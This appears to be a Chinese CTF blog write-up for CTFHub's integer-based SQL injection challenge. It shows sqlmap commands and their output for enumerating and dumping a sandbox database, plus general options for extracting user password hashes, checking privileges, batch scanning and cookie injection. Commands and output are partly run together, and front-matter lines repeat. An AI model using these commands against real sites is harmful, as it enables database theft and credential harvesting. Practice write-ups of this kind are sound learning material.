414 字
2 分钟
整数型SQL注入
ctfhub{f797878b77751f2aa52c00bd}
检测注入点
sqlmap -u "http://challenge-ee02641a7b40090e.sandbox.ctfhub.com:10800/?id=1" //检测过程中需要手动输入y/n,即是否继续进行[sql注入](sql注入.md)检测sqlmap -u "http://challenge-ee02641a7b40090e.sandbox.ctfhub.com:10800/?id=1" --batch //检测过程中默认继续进行[sql注入](sql注入.md)检测产看所有数据库
sqlmap -u "http://challenge-ee02641a7b40090e.sandbox.ctfhub.com:--dbsavailable databases [4]:[*] information_schema[*] mysql[*] performance_schema[*] sqli查看当前网站使用的数据库
sqlmap -u "http://challenge-ee02641a7b40090e.sandbox.ctfhub.com:10800/?id=1" --current-db产看数据表
sqlmap -u "http://challenge-ee02641a7b40090e.sandbox.ctfhub.com:10800/?id=1" -D 'sqli' --tablesDatabase: sqli[2 tables]+------+| flag || news |+------+查看字段
sqlmap -u "http://challenge-ee02641a7b40090e.sandbox.ctfhub.com:10800/?id=1" -D 'sqli' -T 'flag' --columnsDatabase: sqliTable: flag[1 column]+--------+--------------+| Column | Type |+--------+--------------+| flag | varchar(100) |+--------+--------------+查看字段数据
sqlmap -u "http://challenge-ee02641a7b40090e.sandbox.ctfhub.com:10800/?id=1" -D 'sqli' -T 'flag' --dumpabase 'sqli'Database: sqli'Table: flag[1 entry]+----------------------------------+| flag |+----------------------------------+| ctfhub{4598642ab583bc461923d8c9} |+----------------------------------+查看数据库用户
sqlmap -u "http://challenge-ee02641a7b40090e.sandbox.ctfhub.com:10800/?id=1" --current-user查看所有用户
sqlmap -u 完整url --users获取数据库用户密码
sqlmap -u 完整url --passwords查看用户权限
sqlmap -u 完整url --privileges判断当前数据库用户是否是管理员
sqlmap -u 完整url --is-dba自动化扫描
将抓到的数据包右键copy to file,然后使用kali注入
sqlmap -r '数据包路径' --dbs --batch批量自动化扫描
新建xxx.txt文件,里面存放多个url
sqlmap -m xxx.txtpost请求注入
将抓包抓到的http请求内容存放到.txt文件中
sqlmap -r xxx.txttags: [web渗透] title: 整数型SQL注入 title: 整数型SQL注入 title: 整数型SQL注入 tags: [web渗透] title: 整数型SQL注入
tags: [web渗透]
cookie注入
一些需要登录的网站在用sqlmap进行注入时,需要添加cookie参数:
sqlmap -u 完整curl --cookie 'cookie'(单引号和双引号都行)部分信息可能已经过时









